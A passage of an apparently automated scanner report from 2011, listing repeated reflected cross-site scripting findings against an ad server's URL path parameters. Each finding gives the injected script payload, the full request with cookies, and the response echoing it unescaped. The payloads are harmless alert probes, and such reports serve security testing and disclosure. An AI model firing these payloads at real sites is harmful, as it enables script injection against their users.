The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8482"><script>alert(1)</script>bb2b30cb153 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1e8482"><script>alert(1)</script>bb2b30cb153/BTRT1/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1e8482"><script>alert(1)</script>bb2b30cb153/BTRT1/728/2062777249/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.73. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 266d4"><script>alert(1)</script>03f7cc0c04f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1266d4"><script>alert(1)</script>03f7cc0c04f/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1266d4"><script>alert(1)</script>03f7cc0c04f/728/496007092/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.74. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c950c"><script>alert(1)</script>3ee1ce96ffb was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728c950c"><script>alert(1)</script>3ee1ce96ffb/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728c950c"><script>alert(1)</script>3ee1ce96ffb/1687534056/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.75. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45e55"><script>alert(1)</script>e0df0920427 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x9045e55"><script>alert(1)</script>e0df0920427 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:33 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 357
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5045525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/1988655677/x9045e55"><script>alert(1)</script>e0df0920427/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.76. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2866"><script>alert(1)</script>35771b99b3b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3b2866"><script>alert(1)</script>35771b99b3b/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:16 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3b2866"><script>alert(1)</script>35771b99b3b/FarmersBranding/2011Q1/BTRT1/728/77016977/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.77. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbe2"><script>alert(1)</script>3f1bfa77c87 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding9fbe2"><script>alert(1)</script>3f1bfa77c87/2011Q1/BTRT1/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:18 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding9fbe2"><script>alert(1)</script>3f1bfa77c87/2011Q1/BTRT1/728/1096239429/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.78. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 732ad"><script>alert(1)</script>dbf52c5f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1732ad"><script>alert(1)</script>dbf52c5f68/BTRT1/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1732ad"><script>alert(1)</script>dbf52c5f68/BTRT1/728/326445065/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.79. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99f4d"><script>alert(1)</script>b561cc16413 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT199f4d"><script>alert(1)</script>b561cc16413/728/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 363
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT199f4d"><script>alert(1)</script>b561cc16413/728/98466057/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.80. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf0eb"><script>alert(1)</script>ba41c20be5c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728cf0eb"><script>alert(1)</script>ba41c20be5c/11297259930614@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728cf0eb"><script>alert(1)</script>ba41c20be5c/970169256/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.81. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90 [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x90

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a209"><script>alert(1)</script>60585c96bd7 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259930614@x901a209"><script>alert(1)</script>60585c96bd7 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'%3E%3Cscript%3Ealert(1)%3C/script%3E9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e3e45525d5f4f58455e445a4a423660; session=1297259893|1297260360

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 14:30:28 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 356
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/770431857/x901a209"><script>alert(1)</script>60585c96bd7/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.82. http://blog.csdn.net/jiji262/archive/2007/07/28/1713771.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.csdn.net
Path:   /jiji262/archive/2007/07/28/1713771.aspx

Issue detail

